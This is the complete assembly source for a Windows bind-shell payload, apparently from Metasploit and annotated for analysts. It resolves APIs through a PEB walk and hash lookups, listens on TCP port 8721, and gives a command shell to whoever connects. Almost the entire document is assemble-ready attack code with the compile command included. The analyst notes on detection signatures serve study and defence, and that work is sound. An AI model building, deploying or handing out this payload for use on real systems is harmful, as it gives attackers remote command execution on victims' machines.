; Title: Win32 Bind Shell
; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
; Function: Listen for connection and spawn command shell
; Author: hdm[at]metasploit.com
; Compile: nasm -f bin -o win32_bind.bin win32_bind.asm
[BITS 32]
global _start
;-----------------------------------------------------------------------
; Entry point.  The CALL below is the usual position-independent address
; trick: it pushes the address of LDataSegment (the byte right after the
; CALL) as a "return address", which LLoadFunctions then pops into ebx.
; Control never comes back here; the code simply runs label to label.
;
; Analyst note: the ROR-13 API hash constants, the "WS2_32.DLL" string
; and the "CMD" command line in this data block are static bytes and are
; the natural detection signatures for this payload family.
;-----------------------------------------------------------------------
_start:
LCaller:
        call LLoadFunctions             ; pushes &LDataSegment; does not return
LDataSegment:
;========================
; Data block, later reached through [ebp] (= &LDataSegment).
; Layout: byte offset in this block -> meaning -> ebp-relative slot that
; receives the resolved address (slot = ebp + 8 + index*4, see LStartLoading).
        dd "CMD"                        ; +0   lpCommandLine; dd pads to "CMD",0
        dd 0x79c679e7                   ; +4   closesocket          -> [ebp+12]
        dd 0x498649e5                   ; +8   accept               -> [ebp+16]
        dd 0xe92eada4                   ; +12  listen               -> [ebp+20]
        dd 0xc7701aa4                   ; +16  bind                 -> [ebp+24]
        dd 0xadf509d9                   ; +20  WSASocketA           -> [ebp+28]
        dd 0x3bfcedcb                   ; +24  WSAStartup           -> [ebp+32]
        dd 0xec0e4e8e                   ; +28  LoadLibraryA         -> [ebp+36]
        dd 0x73e2d87e                   ; +32  ExitProcess          -> [ebp+40]
        dd 0xce05d9ad                   ; +36  WaitForSingleObject  -> [ebp+44]
        dd 0x16b3fe72                   ; +40  CreateProcessA       -> [ebp+48]
        db "WS2_32.DLL", 0x00, 0x01     ; +44  NUL-terminated DLL name; 0x01 is padding
;========================
;-----------------------------------------------------------------------
; Main body.  Resolves the ten imports into a table on the stack, then
; runs: WSAStartup -> WSASocketA -> bind(0.0.0.0:8721) -> listen ->
; accept -> CreateProcessA("CMD") with the accepted socket as stdin/out/err
; -> WaitForSingleObject -> closesocket -> ExitProcess.
;
; Register roles after setup:
;   ebp      -> stack slot holding &LDataSegment; [ebp+12..48] = API table
;   ebx      = kernel32 base, then ws2_32 handle, then the listening socket
;   edi      = 0 (reused as a cheap NULL/0 argument), later the client socket
;
; Analyst note: the fs:[0x30] PEB walk, the hash-resolve loop and the
; 16-bit "sub sp" size tricks are the behaviours a detection rule keys on.
;-----------------------------------------------------------------------
LLoadFunctions:
        pop ebx                         ; ebx = &LDataSegment (pushed by the CALL)
        push esp                        ; save original esp (lands at [ebp+4])
        mov ebp, esp                    ; ebp = frame anchor for the API table
        mov [ebp], ebx                  ; [ebp] = &LDataSegment
LKernel32Base:
        ; Locate kernel32.dll without imports:
        ;   fs:[0x30]            -> PEB
        ;   PEB+0x0c             -> PEB_LDR_DATA
        ;   Ldr+0x1c             -> InInitializationOrderModuleList.Flink
        ;   lodsd                -> second entry of that list
        ;   entry+0x08           -> DllBase (relative to the list-links field)
        ; On the platforms named in the header the second init-order module
        ; is kernel32; later Windows versions order this list differently,
        ; so this lookup is version-dependent.
        push byte 0x30
        pop ecx                         ; ecx = 0x30 via push/pop (shorter than mov)
        mov eax, [fs:ecx]               ; eax = PEB
        mov eax, [eax + 0x0c]           ; eax = PEB->Ldr
        mov esi, [eax + 0x1c]           ; esi = &InInitializationOrderModuleList.Flink
        lodsd                           ; eax = next list entry (esi += 4)
        mov ebx, [eax + 0x08]           ; ebx = that module's DllBase (kernel32)
        jmp short LStartLoading
LLoadWinsock:
        ; Reached from the resolve loop when ecx == 6: the previous
        ; iteration (ecx == 7) resolved LoadLibraryA, so eax still holds it.
        lea edx, [edi + 44]             ; edx = &"WS2_32.DLL" (data block + 44)
        push ecx                        ; save loop counter across the call
        push edx                        ; lpLibFileName
        call eax                        ; LoadLibraryA("WS2_32.DLL"); stdcall cleans the arg
        mov ebx, eax                    ; ebx = ws2_32 handle; remaining hashes resolve from it
        pop ecx                         ; restore loop counter (still 6)
        jmp short Looper2
LStartLoading:
        ; The resolved addresses are stored at esi + ecx*4 with esi = ebp+8,
        ; i.e. [ebp+12] .. [ebp+48].  Those slots lie ABOVE the stack pointer
        ; this code was entered with, so 40 bytes of the hijacked thread's
        ; own stack are overwritten here.
        push byte 0x08
        pop esi
        add esi, ebp                    ; esi = ebp + 8 (table base)
        ; Function counter: 10 hashes, indices 10 down to 1
        push byte 0x0a
        pop ecx                         ; ecx = 10
        mov edi, [ebp]                  ; edi = &LDataSegment (hash table base)
Looper:
        cmp cl, 0x06
        je short LLoadWinsock           ; kernel32 names done; switch to ws2_32
Looper2:
        push ecx                        ; save the counter (LGetProcAddress clobbers it)
        push ebx                        ; arg 2: module base
        push dword [edi + ecx*4]        ; arg 1: ROR-13 hash of the export name
        call LGetProcAddress            ; eax = address, or 0 if the hash was not found
        pop ecx                         ; restore the counter
        mov [esi + ecx * 4], eax        ; table[ecx] = eax; a 0 here is never checked
        loop Looper                     ; ecx--, repeat while ecx != 0
        xor edi, edi                    ; edi = 0, used as a NULL/0 argument below
LWSAStartup:
        ; WSAStartup(0x101, lpWSAData)
        ; 16-bit operand-size form: only the low 16 bits of esp move, which
        ; is a size trick that assumes the stack does not cross a 64K boundary.
        sub sp, 400                     ; reserve 400 bytes for WSADATA
        push esp                        ; lpWSAData
        push 0x101                      ; wVersionRequested = 1.1
        call [ebp + 32]                 ; WSAStartup
LWSASocketA:
        ; WSASocketA(af=2 AF_INET, type=1 SOCK_STREAM, protocol=0,
        ;            lpProtocolInfo=0, g=0, dwFlags=0), pushed right to left
        push edi                        ; dwFlags = 0
        push edi                        ; g = 0
        push edi                        ; lpProtocolInfo = 0
        push edi                        ; protocol = 0
        inc edi
        push edi                        ; type = 1
        inc edi
        push edi                        ; af = 2
        call [ebp + 28]                 ; WSASocketA
        mov ebx, eax                    ; ebx = listening socket
        xor edi, edi                    ; edi = 0 again
LBind:
        ; Build a 16-byte sockaddr_in on the stack: two zero dwords, then
        ; {sin_family=2, sin_port=0x1122 (network order = 8721), sin_addr=0}.
        push edi                        ; sin_zero[4..7]
        push edi                        ; sin_addr = INADDR_ANY, sin_zero[0..3]
        push dword 0x11220002           ; sin_family = AF_INET, sin_port = htons(8721)
        mov esi, esp                    ; esi = &sockaddr_in (reused by accept)
        push byte 0x10                  ; namelen = 16
        push esi                        ; name
        push ebx                        ; s
        call [ebp + 24]                 ; bind(s, &sa, 16)
LListen:
        push edi                        ; backlog = 0
        push ebx                        ; s
        call [ebp + 20]                 ; listen(s, 0)
LAccept:
        push edi                        ; addrlen = NULL
        push esi                        ; addr (the same sockaddr_in buffer)
        push ebx                        ; s
        call [ebp + 16]                 ; accept(s, &sa, NULL) -- blocks here
        mov edx, eax                    ; edx = accepted client socket
LCreateProcessStructs:
        ; allocate space for STARTUPINFO (68 bytes) + PROCESS_INFORMATION (16)
        sub sp, 0x54                    ; 0x54 = 84; same 16-bit size trick as above
        ; zero out SI/PI: 21 dwords = 84 bytes
        lea edi, [esp]                  ; edi = esp (destination for rep stosd)
        xor eax, eax
        push byte 21
        pop ecx                         ; ecx = 21
LBZero:
        rep stosd                       ; leaves ecx = 0, which is reused as NULL below
        mov edi, edx                    ; edi = client socket
        ; Layout: pi at [esp], si at [esp+16]
        mov byte [esp + 16], 68         ; si.cb = sizeof(STARTUPINFO)
        inc byte [esp + 61]             ; si.dwFlags (si+44) byte 1 -> 0x100 = STARTF_USESTDHANDLES
        ; hand the socket to the child as all three standard handles
        mov [esp + 16 + 56], edi        ; si.hStdInput
        mov [esp + 16 + 60], edi        ; si.hStdOutput
        mov [esp + 16 + 64], edi        ; si.hStdError
        lea eax, [esp + 16]             ; eax = &si
        ; CreateProcessA(NULL, "CMD", NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi)
        push esp                        ; lpProcessInformation
        push eax                        ; lpStartupInfo
        push ecx                        ; lpCurrentDirectory = NULL
        push ecx                        ; lpEnvironment = NULL
        push ecx                        ; dwCreationFlags = 0
        inc ecx
        push ecx                        ; bInheritHandles = TRUE (needed for the socket handles)
        dec ecx
        push ecx                        ; lpThreadAttributes = NULL
        push ecx                        ; lpProcessAttributes = NULL
        push dword [ebp]                ; lpCommandLine = "CMD"
        push ecx                        ; lpApplicationName = NULL
LCreateProcess:
        call [ebp + 48]                 ; CreateProcessA
        mov ecx, esp                    ; ecx = &pi (stdcall already popped the args)
LWaitForSingleObject:
        push 0xFFFFFFFF                 ; dwMilliseconds = INFINITE
        push dword [ecx]                ; hHandle = pi.hProcess
        call [ebp + 44]                 ; WaitForSingleObject -- waits for the shell to exit
LCloseSocket:
        push edi                        ; s = client socket
        call [ebp + 12]                 ; closesocket
LFinished:
        ; ExitProcess with no argument pushed: uExitCode is whatever dword
        ; happens to sit at [esp] (the pi block).
        call [ebp + 40]                 ; ExitProcess
;-----------------------------------------------------------------------
; LGetProcAddress -- resolve an export by ROR-13 name hash.
; C-equivalent: void *LGetProcAddress(uint32_t hash, void *module_base)
;               (stdcall: callee pops both args with "ret 8")
; In:    [esp+4] = hash, [esp+8] = module base (PE image in memory)
; Out:   eax = address of the export, or 0 if no name hashes to `hash`
;        edx = module base
; Clobb: ecx, edx, flags, DF (cleared)
; Saves: ebx, ebp, esi, edi
;
; Walks the PE export directory backwards over AddressOfNames, hashing
; each name with  h = ror(h, 13) + byte  until the terminating NUL, and
; compares against the requested hash.  On a hit the matching ordinal
; selects the RVA in AddressOfFunctions.
;
; Analyst note: the "ror edi, 13 / add edi, eax" pair is the well-known
; Metasploit hash loop; the hash constants in LDataSegment belong to it.
;-----------------------------------------------------------------------
LGetProcAddress:
        push ebx
        push ebp
        push esi
        push edi
        mov ebp, [esp + 24]             ; ebp = module base (arg 2, after 4 pushes + ret addr)
        mov eax, [ebp + 0x3c]           ; eax = e_lfanew (offset of PE header)
        mov edx, [ebp + eax + 120]      ; edx = DataDirectory[0].VirtualAddress (export dir RVA)
        add edx, ebp                    ; edx = &IMAGE_EXPORT_DIRECTORY
        mov ecx, [edx + 24]             ; ecx = NumberOfNames
        mov ebx, [edx + 32]             ; ebx = AddressOfNames RVA
        add ebx, ebp                    ; ebx = &AddressOfNames[0]
LFnlp:
        ; loop invariant: ecx = number of names not yet tried, counting down
        jecxz LNtfnd                    ; no names left -> not found
        dec ecx
        mov esi, [ebx + ecx * 4]        ; esi = RVA of name[ecx]
        add esi, ebp                    ; esi = &name[ecx]
        xor edi, edi                    ; edi = running hash
        cld                             ; lodsb must move forward
LHshlp:
        xor eax, eax                    ; eax = 0, so ah == 0 for the NUL test below
        lodsb                           ; al = next name byte
        cmp al, ah                      ; al == 0 ? (end of name)
        je LFnd
        ror edi, 13
        add edi, eax                    ; hash = ror(hash, 13) + byte
        jmp short LHshlp
LFnd:
        cmp edi, [esp + 20]             ; compare with requested hash (arg 1)
        jnz LFnlp                       ; no match -> try the previous name
        mov ebx, [edx + 36]             ; AddressOfNameOrdinals RVA
        add ebx, ebp
        mov cx, [ebx + 2 * ecx]         ; cx = ordinal for this name (16-bit entries)
        mov ebx, [edx + 28]             ; AddressOfFunctions RVA
        add ebx, ebp
        mov eax, [ebx + 4 * ecx]        ; eax = function RVA
        add eax, ebp                    ; eax = absolute address
        jmp short LDone
LNtfnd:
        xor eax, eax                    ; not found -> return 0 (callers never check this)
LDone:
        mov edx, ebp                    ; edx = module base
        pop edi
        pop esi
        pop ebp
        pop ebx
        ret 8                           ; stdcall: discard hash and base